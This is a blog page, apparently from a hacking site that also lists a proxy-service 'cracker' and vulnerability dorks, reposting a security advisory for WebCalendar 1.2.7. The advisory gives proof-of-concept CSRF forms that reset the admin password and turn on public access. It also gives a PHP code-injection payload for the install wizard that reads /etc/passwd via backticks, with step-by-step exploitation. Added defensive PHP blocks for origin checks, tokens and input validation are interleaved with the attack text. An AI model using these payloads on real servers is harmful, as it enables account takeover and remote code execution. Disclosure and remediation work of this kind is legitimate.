Saturday, July 30, 2016

VIP72 Pro Version Cracker + NEW FRESH free virtual account 1 month / 3 months

Posted 7:55:00 AM by Admin



WordPress TimThumb Bug Dorks 2016

Posted 7:43:00 AM by Admin



Thursday, July 7, 2016

Anonymous Proxy List - 7 July 2016

Posted 2:13:00 AM by Admin

Proxy List:

WebCalendar 1.2.7 - Multiple Vulnerabilities

Posted 2:04:00 AM by Admin


[+] Credits: John Page aka HYP3RLINX

Vendor:
==========================
www.k5n.us/webcalendar.php

Product:
==================
WebCalendar v1.2.7

WebCalendar is a PHP-based calendar application that can be configured as a single-user calendar, a multi-user calendar for groups of users, or as an event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2, Interbase, MS SQL Server, or ODBC is required.

WebCalendar can be set up in a variety of ways, such as:

A schedule management system for a single person
A schedule management system for a group of people, allowing one or more assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new events
A calendar server that can be viewed with iCalendar-compliant calendar applications like Mozilla Sunbird, Apple iCal or GNOME Evolution, or RSS-enabled applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.

  
Vulnerability Type:
======================
CSRF PROTECTION BYPASS

CVE Reference:
==============
N/A

Vulnerability Details:
=====================

WebCalendar attempts to use the HTTP Referer header to check that requests originate from the same server, as shown below.

From the WebCalendar "include/functions.php" file, line 6117:

////////////////////////////////////////////////////////////

function require_valide_referring_url ()
{
  global $SERVER_URL;

  if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
    // Missing the REFERER value
    //die_miserable_death ( translate ( 'Invalid referring URL' ) );
    // Unfortunately, some version of MSIE do not send this info.
    return true;
  }

  if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
    // Gotcha.  URL of referring page is not the same as our server.
    // This can be an instance of XSRF.
    // (This may also happen when more than address is used for your server.
    // However, you're not supposed to do that with this version of
    // WebCalendar anyhow...)
    die_miserable_death ( translate ( 'Invalid referring URL' ) );
  }
}

/////////////////////////////////////////////////////////////////////////////////////////
  
However, this can be easily defeated by simply not sending a Referer. HTML5 includes a handy tag <meta name="referrer" content="none"> to omit the Referer when making an HTTP request, currently supported in Chrome, Safari, MobileSafari and other WebKit-based browsers. Using this meta tag we send no referrer, and the vulnerable application will then happily process our CSRF requests.
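The check above fails open when the header is absent and only tests $SERVER_URL as an unanchored substring of the Referer. The following is an added example, not WebCalendar's own code: a replacement that fails closed when neither Origin nor Referer is present, compares scheme, host and port exactly, and additionally requires a per-session synchronizer token so the decision never rests on a header a browser can be told to suppress. The function names and the sample URLs are assumptions.

```php
<?php
// Added example, not WebCalendar code: a fail-closed origin check plus a
// per-session synchronizer token. $server_url is assumed to be the configured
// base URL of the site, as WebCalendar's $SERVER_URL is, e.g. "https://cal.example.org/".

// Compare scheme, host and port of two URLs; path and query are ignored.
function same_origin(string $a, string $b): bool {
    $pa = parse_url($a);
    $pb = parse_url($b);
    if ($pa === false || $pb === false || empty($pa['host']) || empty($pb['host'])) {
        return false;
    }
    $norm = function (array $p): string {
        $scheme = strtolower($p['scheme'] ?? 'http');
        $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
        return $scheme . '://' . strtolower($p['host']) . ':' . $port;
    };
    return $norm($pa) === $norm($pb);
}

// True only when the request demonstrably came from our own origin. Origin is
// preferred over Referer; a request carrying neither is rejected, which is
// exactly the case <meta name="referrer" content="none"> produces.
function request_from_own_origin(array $server, string $server_url): bool {
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source === '' || $source === 'null') {
        return false;
    }
    return same_origin($source, $server_url);
}

// Synchronizer token: generated once per session, embedded as a hidden field in
// every state-changing form, and compared in constant time on submit.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_token_valid(array $session, ?string $submitted): bool {
    return isset($session['csrf_token'])
        && is_string($submitted)
        && hash_equals($session['csrf_token'], $submitted);
}

// Replacement for require_valide_referring_url(): both checks must pass, and
// the header check alone is never trusted, since headers can be suppressed.
function require_valid_request(array $server, array $post, array $session, string $server_url): void {
    if (!request_from_own_origin($server, $server_url)
        || !csrf_token_valid($session, $post['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid request origin or token');
    }
}

// Constructed requests (no real traffic) covering the three cases the check
// must distinguish: same origin, no header at all, and a foreign origin.
$site = 'https://cal.example.org/';
var_dump(request_from_own_origin(['HTTP_REFERER' => 'https://cal.example.org/edit_user.php'], $site));
var_dump(request_from_own_origin([], $site));
var_dump(request_from_own_origin(['HTTP_ORIGIN' => 'https://other.example.net'], $site));

// Token round trip: the issued token validates, anything else does not.
$session = [];
$token = csrf_token($session);
var_dump(csrf_token_valid($session, $token));
var_dump(csrf_token_valid($session, 'some-other-value'));
```

With this in place the second request in the sample (no Origin and no Referer) is refused rather than waved through, and a forged form that does carry a valid Referer still fails on the missing token.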
  
  
  
Exploit code(s):
===============

1) CSRF Protection Bypass to change Admin password POC. Note: the name of the victim user is required for success.

<meta name="referrer" content="none">

<form id="CSRF" action="
<input type="hidden" name="formtype" value="setpassword" />
<input type="hidden" name="user" value="admin" />
<input name="upassword1" id="newpass1" type="password" value="1234567"  />
<input name="upassword2" id="newpass2" type="password"  value="1234567" />
</form>

2) CSRF Protection Bypass to modify access controls under "System Settings" / "Allow public access"

<meta name="referrer" content="none">

<form id="CSRF_ACCESS_CTRL" action="
name="prefform"><br />
<input type="hidden" name="currenttab" id="currenttab" value="settings" />
<input type="submit" value="Save" name="" />
<input type="hidden" name="admin_PUBLIC_ACCESS" value="Y"  />
<script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script>
</form>

#######################################################
  
Vulnerability Type:
======================
PHP Code Injection
  
  
  
CVE Reference:
==============
N/A
  
  
  
Vulnerability Details:
=====================
  
Since WebCalendar's install script is not removed after installation (there is no "automatic" removal of it), low-privileged users can inject arbitrary PHP code via the "Database Cache" directory value, as no input validation exists for it when a user installs the application using the WebCalendar walk-through wizard.

If WebCalendar's installation script is available as part of a default image, often as a convenience by some hosting providers, this can be used to gain code execution on the target system. The only requirement is that the user must have privileges to authenticate to the MySQL database and to run the install script. So, users who have install wizard access for the WebCalendar application will now have the ability to launch arbitrary system commands on the affected host.

One problem we must overcome is that WebCalendar filters double quotes ("), so we cannot use code like <?php echo "/bin/cat /etc/passwd"; ?>. However, we can defeat this obstacle using the all too forgotten backtick `CMD` operator!

e.g.

*/?><?php echo `/bin/cat /etc/passwd`; ?>

This results in "settings.php" being injected like...
  
<?php
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400
install_password: e99a18c428cb38d5f260853678922e03
db_type: mysql
db_host: localhost
db_database: intranet
db_login: admin
db_password: abc123
db_persistent: false
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>
readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>
  
  
  
Exploitation step(s):
=====================

1) Log in to the WebCalendar Installation Wizard.

2) Proceed to Step 2 of the WebCalendar Installation Wizard.

3) Click the "Test Settings" button to ensure a connection to the database.

4) Enter the PHP code below as the value of the "Database Cache Directory:" input field to pop a calculator for the POC (Windows).

*/?><?php exec(`calc.exe`); ?>

5) Click the "Next" button
6) Click the "Next" button
7) Click the "Save settings" button

BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.

If you happen to get the following error when clicking the "Test Settings" button, "Failure Reason: Database Cache Directory does not exist", just click the back button and then forward, or click "Test settings" again, to get past the error.
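The root cause shown in the injected settings.php above is that the installer copies the untrusted cache-directory value verbatim into a PHP comment block and strips only double quotes, so a value beginning with `*/?>` closes the comment and the PHP block and everything after it is parsed as code. The following is an added example, not WebCalendar's own code, of how an installer should treat that value: a whitelist validator that only accepts path-like strings, and a writer that refuses anything else and, as defence in depth, breaks the comment and tag terminators. The function names and the sample values are assumptions.

```php
<?php
// Added example, not WebCalendar code: validate the "Database Cache Directory"
// value before it is written into settings.php, rather than only stripping
// double quotes as the install script does. Function names are assumptions.

// Accept only something shaped like a filesystem path: letters, digits and a
// small set of path characters. The comment terminator "*/" and the PHP open
// and close tags contain characters outside this set, so they can never pass.
function is_safe_cachedir(string $value): bool {
    if ($value === '' || strlen($value) > 255) {
        return false;
    }
    return preg_match('~^[A-Za-z0-9_./\\\\:-]+$~', $value) === 1;
}

// Defence in depth for any value that ends up inside the comment block of a
// generated PHP file: split the sequences that would close the comment or the
// PHP block, so nothing after them can be parsed as code.
function neutralise_for_php_comment(string $value): string {
    return str_replace(['*/', '?' . '>', '<' . '?'], ['* /', '? >', '< ?'], $value);
}

// Render the settings.php body in the same key: value layout the advisory
// shows. Throws on a bad cache directory instead of writing an executable file.
function render_settings(array $settings): string {
    if (!is_safe_cachedir($settings['db_cachedir'] ?? '')) {
        throw new InvalidArgumentException('Database Cache Directory must be a plain path');
    }
    $out = "<?php\n/* generated by installer\n";
    foreach ($settings as $key => $value) {
        $out .= $key . ': ' . neutralise_for_php_comment((string) $value) . "\n";
    }
    return $out . "# end settings.php */\n?" . ">\n";
}

// Constructed inputs: a value shaped like the advisory's payload (a harmless
// phpinfo() call stands in for the command), and an ordinary cache path.
$injected = '*/?><?php phpinfo(); ?>';
$normal   = '/var/cache/webcalendar';
var_dump(is_safe_cachedir($injected), is_safe_cachedir($normal));
echo render_settings(['db_type' => 'mysql', 'db_cachedir' => $normal]);

try {
    render_settings(['db_type' => 'mysql', 'db_cachedir' => $injected]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Validation belongs in the installer, but the advisory's other point still stands on its own: an install script that remains reachable after setup should be removed or access-restricted regardless of how well it validates input.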
  
  
Disclosure Timeline:
===============================
Vendor Notification:  No replies
July 4, 2016 : Public Disclosure
  
  
  
  
Exploitation Technique:
=======================
Remote
  
  
  
Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N